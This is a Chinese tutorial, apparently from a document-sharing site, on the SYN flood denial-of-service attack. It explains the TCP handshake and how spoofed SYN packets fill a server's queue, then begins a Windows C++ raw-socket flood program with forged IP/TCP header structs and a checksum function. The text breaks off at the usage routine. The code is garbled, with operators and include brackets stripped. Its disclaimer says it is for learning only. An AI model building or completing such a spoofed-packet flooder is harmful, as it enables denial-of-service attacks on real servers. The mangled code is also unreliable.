SYNFLOOD简单分析及实现.docVIP

SYN_FLOOD 简单分析及实现 声明: 此程序有一定攻击性，请只供学习之用，不要危害祖国的网络。如发动攻击一切后果。 网络上发送数据包的攻击有多种（如ICMP_FLOOD, 碎片攻击，等）其中有一种就是 利用TCP 协议三次 握手的攻击（SYN_FLOOD）。下面 就简单 讲述一下 TCP 的三次 握手。 现在 有A,B 两台 机器，其中B是SERVER.A是CLIENT. 首先 A 发送送一个 带有SYN标记（带起始序列号）的数据报 给B。 然后 B 接收， 然后 发送一个ACK+SYN(带B机的起始序列号 和 A的确认号）给A。 最后 A 再发送 一个带序列号 和 确认号的 数据报 给 B。 此时 连接 完成。 利用这个原理，如果A机在第一步伪装大量不存在的机器，给B发送大量的SYN包，那么B会以为有很多合法的机器请求连接，然后一一回应。然后等待第三次 确认建立连接。那么大量等待连接的请求被保留在栈中。一般服务器等待2分钟还没等到第三次握手，那么就会从等待连接的栈中删除连接请求。如果A的SYN发送得足够快，合法用户连接不上，那么服务器也会花费大量的资源来维护栈。从而照成D.o.S攻击。 通过RAW_SOCKET，只要你是管理员，就可以伪造IP和TCP头部，发虚假源地址的SYN请求。 简单实现如下： /* FLOOD.CPP*/ #include stdio.h #include winsock2.h #include ws2tcpip.h #include windows.h #include time.h #include dos.h #pragma comment(lib, ws2_32.lib) #define MAX_RECEIVEBYTE 255 typedef struct ip_head //定义IP首部 { unsigned char h_verlen; //4位首部长度,4位IP版本号 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度（字节） unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 （如SYN,ACK，等） unsigned char ttl; //8位生存时间 TTL unsigned char proto; //8位协议 (如ICMP，TCP等) unsigned short checksum; //16位IP首部校验和 unsigned int sourceIP; //32位源IP地址 unsigned int destIP; //32位目的IP地址 }IPHEADER; typedef struct tcp_head //定义TCP首部 { USHORT th_sport; //16位源端口 USHORT th_dport; //16位目的端口 unsigned int th_seq; //32位序列号 unsigned int th_ack; //32位确认号 unsigned char th_lenres; //4位首部长度/6位保留字 unsigned char th_flag; //6位标志位 USHORT th_win; //16位窗口大小 USHORT th_sum; //16位校验和 USHORT th_urp; //16位紧急数据偏移量 }TCPHEADER; typedef struct tsd_head //定义TCP伪首部 { unsigned long saddr; //源地址 unsigned long daddr; //目的地址 char mbz; char ptcl; //协议类型 unsigned short tcpl; //TCP长度 }PSDHEADER; //CheckSum:计算校验和的子函数 USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size 1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size) { cksum += *(UCHAR*)buffer; } cksum = (cksum 16) + (cksum 0xffff); cksum += (cksum 16); return (USHORT)(~cksum); } 　 void usage() { printf(******************************